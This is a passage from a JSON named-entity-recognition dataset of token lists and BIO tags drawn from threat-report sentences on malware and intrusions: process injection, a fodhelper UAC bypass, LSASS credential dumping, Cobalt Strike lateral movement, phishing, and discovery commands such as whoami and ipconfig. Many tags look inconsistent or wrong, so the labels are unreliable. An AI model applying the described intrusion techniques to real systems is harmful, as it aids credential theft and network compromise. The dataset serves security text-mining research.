"O", "O", "O", "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "It", "enumerates", "files", "and", "directories" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "File", "enumeration" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "using", "FindFirstFileW,", "FindNextFileW,", "and", "FindClose", "APIs" ], "ner_tags": [ "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "For", "each", "directory", "it", "traverses" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "FindFirstFileW,", "FindNextFileW,", "and", "FindClose", "APIs" ], "ner_tags": [ "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "installing", "remote", "access", "software." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "actors", "used", "tools", "such", "as", "PCHunter,", "PowerTool,", "GMER,", "and", "Process", "Hacker", "to", "disable", "any", "security-related", "services", "running", "in", "the", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "listing", "accessible", "local", "IPs" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "checks", "for", "the", "number", "of", "processors", "in", "the", "infected", "system" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Checking", "the", "number", "of", "processors" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "is", "a", "multi-stage", "attack", "that", "involves", "sideloading", "DLLs," ], "ner_tags": [ "O", "O", "O", "O", "B-OffAct", "O", "O", "B-Way", "O" ] }, { "tokens": [ "involves", "sideloading", "DLLs", "along" ], "ner_tags": [ "O", "B-Way", "O", "O" ] }, { "tokens": [ "icon", "files", "with", "encrypted", "data", "appended", "to", "the", "end", "of", "the", "files." ], "ner_tags": [ "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "encrypted", "strings," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "once", "decrypted,", "contained", "the", "C2", "domains", "for", "additional", "malicious", "artifacts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attempt", "to", "obtain", "system", "information" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "attempts", "to", "retrieve", "additional", "malicious", "artifacts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inject", "and", "execute", "DLLs" ], "ner_tags": [ "B-Features", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Manipulate", "processes", "(list" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Manipulate", "files", "and", "directories", "(list" ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "Manipulate", "files", "and", "directories", "(list,", "download,", "upload,", "view,", "delete" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-HackOrg", "B-Features", "B-Features", "B-Features", "B-Features", "B-Features" ] }, { "tokens": [ "download,", "upload" ], "ner_tags": [ "B-Features", "B-Features" ] }, { "tokens": [ "Take", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Execute", "commands", "via", "Command", "Prompt" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "using", "ShellExecute", "with", "the", "following", "command", "line:" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "type", "of", "threats", "is", "usually", "delivered", "as", "email", "attachments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Encoded", "binary", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Encrypted", "and", "compressed", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Start", "of", "encrypted", "and", "compressed", "loader", "configuration", "and", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "an", "encoded", "payload", "split", "across", "several", "nodes,", "further", "complicating", "its", "extraction." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "That", "node", "contains", "the", "encoded", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "encoded", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "To", "hide", "the", "strings", "it", "uses", "during", "its", "execution,", "it", "primarily", "uses", "a", "simple", "encoding", "by", "subtracting", "35", "from", "each", "character", "of", "the", "original", "string", "and", "encoding", "the", "result", "with", "Base64" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Similar", "to", "decoding", "strings,", "the", "binary", "payload", "is", "extracted", "by", "decoding", "the", "data", "using", "Base64", "and", "adding", "35." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "resulting", "bytes", "are", "further", "decoded", "with", "xor", "82." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decoded", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Once", "the", "payload", "is", "decoded" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "decrypting", "and", "decompressing", "the", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decrypted", "and", "decompressed", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Decodes", "sensitive", "memory", "regions", "in", "the", "current", "process", "with", "the", "same", "XOR", "key" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "locates", "a", "packed", "and", "compressed", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Injection", "type:", "Current", "process", "(1)", "or", "in", "the", "new", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "to", "inject", "into" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Process", "to", "inject", "into" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "this", "loader", "prepends", "a", "stub", "containing", "79", "bytes", "of", "junk", "instructions", "before", "the", "actual", "payload", "shellcode." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "bytes", "at", "25", "hardcoded", "offsets", "within", "this", "stub", "are", "replaced", "with", "random", "bytes", "to", "hinder", "shellcode", "detection." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "launch", "the", "shellcode,", "the", "loader", "calls", "ZwCreateThreadEx", "to", "create", "a", "new", "suspended", "injection", "thread", "hidden", "from", "debuggers", "using", "the", "THREAD_CREATE_FLAGS_CREATE_SUSPENDED", "(0x01)", "and", "THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER", "(0x4)", "thread", "creation", "flags." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "by", "redirecting", "calls", "to", "the", "Windows", "Sleep", "API", "to", "its", "own", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "communicates", "with", "the", "C2", "server", "specified", "in", "the", "configuration", "via", "HTTP", "or", "HTTPS", "POST", "requests" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "shared", "with", "the", "C2", "server", "on", "the", "initial", "check-in", "request", "(Figure", "11)", "for", "encrypting", "subsequent", "data", "communicated", "between", "the", "agent", "and", "C2", "server", "with", "AES-256-CTR." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "execution", "of", "the", "downloaded", "DLL", "via", "the", "tool", "rundll32.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "performs", "the", "download", "of", "a", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "script", "that", "downloads", "and", "executes", "a", "dropper" ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "downloads", "a", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "malware", "dynamically", "calls", "the", "API", "NtAllocateVirtualMemory" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "AES", "Cryptographic", "Provider", "from", "WinCrypt", "APIs" ], "ner_tags": [ "B-SamFile", "O", "I-SecTeam", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "API", "Web", "RESTful", "that", "provides", "access", "to", "Microsoft", "Cloud", "service", "resources." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "Microsoft", "Graph", "API" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "the", "Microsoft", "Graph", "API" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "using", "the", "RSA" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "malware", "proceeds", "to", "de-obfuscate", "strings", "using", "a", "XOR", "loop" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "de-obfuscated", "strings:" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypted", "through", "an", "AES-256-CBCdecryption", "algorithm" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "decrypted" ], "ner_tags": [ "O" ] }, { "tokens": [ "the", "decrypted", "content" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "code", "in", "the", "injected", "PE" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "in", "itself", "a", "new", "PE", "(Portable", "Executable)", "file," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "passes", "the", "execution", "to", "the", "region", "of", "memory", "in", "which", "the", "copied", "PE", "is", "allocated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "imported", "code", "dynamically", "calls", "VirtualAlloc", "to", "allocate", "a", "new", "region", "of", "memory", "in", "which", "a", "new", "PE", "file", "is", "copied." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "the", "full", "HTTP", "request", "to", "make", "the", "first", "connection", "to", "the", "C&C" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enumerating", "the", "child", "files", "in", "the", "check", "OneDrive", "subdirectory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "execution", "triggers", "the", "setting", "of", "the", "following", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "triggered", "when", "the", "user", "starts", "the", "presentation", "mode", "and", "moves", "the", "mouse" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "triggered", "when", "the", "user", "starts", "the", "presentation", "mode", "and", "moves", "the", "mouse" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "new", "file,", "again", "with", "a", "JPEG", "extension" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Contents", "of", "the", ".img", "file,", "including", "the", "hidden", "files" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hiding", "the", "rest", "of", "its", "files", "from", "the", "user." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "run", "the", "subsequent", "BAT", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attacker’s", "BAT", "file", "to", "run" ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "The", "BAT", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "BAT", "file", "(4.2)", "to", "be", "run", "on", "logon", "as", "another", "UI", "shell" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "another", "BAT", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Some", "variants", "used", "a", "known", "UAC", "bypass", "method", "abusing", "the", "legitimate", "fodhelper.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "UAC", "bypass", "implementation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "If", "it", "fails,", "it", "sets", "in", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Register", "a", "new", "service" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "new", "service", "that", "will", "run", "its", "VBS", "script", "(4.1)", "using", "sc.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "malicious", "executable", "to", "unpack", "itself." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "is", "unpacked", "only", "when", "run", "with", "a", "unique", "password,", "allow", "evading", "traditional", "signature-based", "detection." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "and", "running", "the", "ransomware" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "user", "is", "then", "prompted", "to", "open", "the", "single", "visible", "shortcut", "(2)", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "obfuscated", "VBA", "scripts", "or", "a", "binary", "with", "a", "JPG", "extension" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "trick", "users", "into", "opening", "the", "malicious", "attachments", "in" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "If", "a", "target", "opens", "the", "malicious", "attachment," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "three", "possible", "types", "of", "messages", "to", "try", "to", "get", "a", "target", "to", "open", "the", "email", "and", "malicious", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "The", "attachment,", "if", "opened," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "spear", "phishing", "emails", "pretending", "to", "be", "from", "financial", "vendors", "or", "partners", "to", "trick", "users", "into", "opening", "the", "malicious", "attachments", "in", "the", "emails." ], "ner_tags": [ "I-Way", "O", "B-Way", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "B-Way" ] }, { "tokens": [ "a", "malicious", "attachment", "sent", "via", "phishing", "emails" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Way" ] }, { "tokens": [ "the", "malicious", "attachment," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "email", "and", "malicious", "attachment." ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "sends", "emails", "pretending", "to", "be", "related", "to", "a", "shipment", "notice", "for", "the", "target", "which", "contain", "a", "malicious", "attachment." ], "ner_tags": [ "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Both", "send", "information", "to", "command", "and", "control", "(C2)", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "keylogging", "every", "tap" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "obtain", "logs", "of", "the", "infected", "machine’s", "keystrokes" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrate", "data", "from", "messaging", "applications", "such", "as", "WhatsApp", "and", "Viber" ], "ner_tags": [ "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "B-Org", "O", "B-Tool" ] }, { "tokens": [ "The", "malware", "can", "deliver", "payloads", "from", "the", "command", "and", "control", "(C2)", "server" ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "vulnerability", "allows", "for", "a", "threat", "actor", "to", "obtain", "system", "privileges" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "take", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "This", "version", "of", "CEIDPageLock", "has", "VMProtect,", "which", "makes", "analysis", "and", "unpacking", "difficult" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "proceeded", "to", "dump", "credentials", "from", "LSASS." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "again", "used", "Get-System", "to", "elevate", "and", "then", "dumped", "LSASS." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Strike", "beacons", "accessing", "LSASS", "on", "multiple", "occasions,", "on", "almost", "every", "compromised", "host." ], "ner_tags": [ "B-Way", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actor", "injected", "into", "a", "dllhost.exe", "process" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "which", "is", "then", "injected", "into", "svchost", "and", "dllhost." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Process", "injection", "was", "observed", "during", "the", "intrusion" ], "ner_tags": [ "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "direct", "Cobalt", "Strike", "processes", "and", "the", "injected", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injecting", "into", "multiple", "other", "processes,", "such", "as", "explorer.exe", "and", "svchost.exe,", "to", "execute", "further", "payloads." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "dumped", "from", "an", "injection", "into", "the", "SearchIndexer", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "was", "achieved", "by", "transferring", "a", "Cobalt", "Strike", "DLL", "over", "SMB" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "the", "SMB", "lateral", "transfer", "of", "one", "of", "the", "Atera", "Agent", "MSI", "installers", "(1.msi)", "used", "to", "gain", "access", "laterally", "on", "a", "host", "and", "provide", "persistence", "for", "later", "access." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SMB", "to", "transfer", "DLL's", "into", "the", "ProgramData", "folder", "of", "hosts", "for", "purposes", "of", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "executing", "via", "a", "remote", "service", "on", "another", "workstation." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "using", "a", "batch", "file", "named", "find.bat." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Windows", "discovery", "commands" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "using", "a", "batch", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "batch", "script" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "basic", "discovery", "tasks", "on", "the", "host", "using", "built", "in", "Windows", "utilities." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "via", "the", "find.bat", "batch", "script." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "was", "then", "fed", "to", "a", "batch", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file", "contained", "one", "line," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "began", "enumerating", "the", "network", "using", "native", "Windows", "binaries" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "via", "the", "interactive", "shell" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "wrote", "a", "registry", "run", "key", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "a", "registry", "run", "key", "to", "maintain", "persistence." ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "systeminfo" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "ipconfig" ], "ner_tags": [ "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "sending", "new", "emails", "with", "attached", "xls", "and", "zip", "files." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "document", "came", "in", "via", "email", "in", "the", "form", "of", "a", "zip", "file", "which", "included", "an", "xls", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "The", "emails", "were", "sent", "through", "various", "compromised", "email", "accounts,", "propagating", "additional", "malicious", "xls", "files" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "the", "remote", "admin", "tools" ], "ner_tags": [ "O", "O", "I-Tool", "O", "B-Tool" ] }, { "tokens": [ "the", "threat", "actor", "deployed", "several", "Atera/Splashtop", "remote", "access", "tools", "across", "the", "environment", "as", "an", "alternative", "means", "of", "access", "to", "the", "environment" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "used", "Atera", "and", "Splashtop", "remote", "access", "tools", "on", "two", "compromised", "hosts", "during", "the", "intrusion." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "after", "a", "user", "opened", "an", "Excel", "document", "and", "enabled", "macros." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "To", "deobfuscate", "the", "document", "the", "tool", "xlmdeobfuscator", "was", "used", "with", "the", "following", "output." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "deobfuscation" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "used", "process", "hollowing", "to", "launch", "under", "the", "context", "of", "the", "Dllhost.exe", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "the", "following", "URLs", "are", "hard", "coded,", "and", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "the", "second", "stage." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "pulled", "down", "and", "executed", "a", "Cobalt", "Strike", "payload", "on" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "ran", "another", "round", "of", "discovery", "activity", "with", "native", "windows", "utilities" ], "ner_tags": [ "O", "O", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "“C:\\Windows\\System32\\cmd.exe”", "CommandLine:", "“C:\\Windows\\system32\\cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "cmd.exe", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "gpupdate" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "gpupdate" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "gpupdate" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "gpupdate" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "whoami.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "cmd.exe", "/C", "whoami" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "The", "threat", "actors", "continued", "by", "moving", "laterally", "to", "the", "domain", "controllers", "on", "the", "network", "using", "SMB", "to", "transfer", "and", "execute", "a", "Cobalt", "Strike", "Beacon" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "used", "PsExec,", "to", "copy", "and", "execute", "a", "Cobalt", "Strike", "Beacon", "DLL", "on", "most", "of", "the", "systems", "in", "the", "network." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "utilized", "RDP," ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actor", "was", "seen", "establishing", "RDP", "connections" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Cobalt", "Strike", "was", "used", "to", "enable", "RDP," ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "remotedesktop", "mode", "=", "enable", "cmd" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "connections", "were", "established", "from", "the", 